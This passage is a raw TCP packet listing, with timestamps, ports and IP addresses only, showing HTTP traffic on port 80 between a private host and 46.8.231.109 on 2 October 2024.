Oct 2, 2024 09:41:27.263415098 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263432026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263463974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263497114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263528109 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263577938 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263608932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263641119 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263689041 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263720989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263753891 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263786077 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263798952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263798952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263798952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263798952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263798952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263834953 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263866901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263901949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263932943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263964891 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263972044 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263972044 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263972044 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263972044 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263972044 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263972044 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263998032 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264046907 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264079094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264108896 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264139891 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264182091 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264182091 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264182091 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264182091 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264182091 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264182091 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264189005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264221907 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264254093 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264302969 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264333963 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264365911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264396906 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264406919 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264406919 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264406919 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264406919 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264406919 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264408112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264430046 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264461994 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264493942 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264525890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264559984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264588118 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264600039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264600039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264600039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264600039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264600992 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264600992 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264621019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264653921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264686108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264718056 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264749050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264781952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264791012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264791012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264791012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264791012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264791012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264791012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264813900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264847040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264878988 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264910936 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264941931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264974117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.264986038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264986992 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264986992 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264986992 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264986992 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.264986992 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.265002012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.265033007 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.265064955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.265098095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.265129089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.265160084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.265196085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.265225887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.265258074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.265288115 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.265288115 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.265289068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.265289068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.265289068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.265289068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.265289068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.265321016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.265352011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.265383959 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.265414953 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.265446901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.265460968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.265460968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.265460968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.265460968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.265460968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.265460968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.265752077 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.714797020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.714854002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.714886904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.714936018 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.714967966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.714968920 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.714968920 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715018034 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715050936 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715080023 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715080023 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715081930 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715096951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715096951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715114117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715146065 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715178013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715209961 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715236902 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715236902 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715236902 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715236902 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715243101 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715274096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715306044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715332985 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715352058 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715352058 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715352058 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715364933 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715405941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715405941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715435028 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715470076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715487003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715487003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715502977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715533018 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715564013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715598106 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715629101 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715646982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715646982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715647936 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715647936 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715661049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715692997 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715723991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715759993 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715761900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715761900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715761900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715761900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715792894 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715825081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715856075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715888023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715918064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715950012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.715958118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715958118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715958118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715958118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715958118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715958118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.715981007 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716012955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716039896 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716088057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716121912 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716152906 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716164112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716164112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716164112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716164112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716164112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716186047 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716216087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716248035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716278076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716310024 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716325998 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716325998 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716325998 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716325998 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716325998 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716336966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716368914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716398954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716427088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716458082 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716468096 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716468096 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716468096 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716468096 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716468096 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716490030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716521025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716552019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716584921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716615915 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716646910 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716679096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716692924 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716692924 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716692924 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716692924 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716692924 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716710091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716741085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716749907 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716749907 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716768980 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716814041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716814041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.716821909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716854095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716886997 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716918945 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716965914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.716998100 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717030048 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717039108 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717040062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717040062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717040062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717040062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717061043 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717092037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717123985 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717154980 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717186928 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717219114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717227936 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717228889 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717228889 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717228889 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717228889 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717228889 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717251062 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717281103 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717314005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717348099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717380047 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717410088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717421055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717421055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717422009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717422009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717422009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717442989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717473984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717505932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717535973 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717566967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717597961 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717632055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717632055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717632055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717632055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717632055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717632055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717647076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717679024 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717710972 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717741013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717772961 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717807055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717807055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717807055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717807055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717822075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717824936 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717824936 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.717854977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717886925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717917919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717952013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.717983961 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718014956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718028069 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718028069 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718028069 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718028069 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718045950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718072891 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718105078 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718136072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718167067 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718198061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718230009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718241930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718241930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718241930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718241930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718241930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718241930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718261957 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718292952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718324900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718355894 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718388081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718419075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718450069 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718481064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718492031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718492031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718492031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718492031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718492031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718492031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718517065 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718547106 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718579054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718610048 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718641996 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718672991 CEST	80	49749	46.8.231.109	192.168.2.4
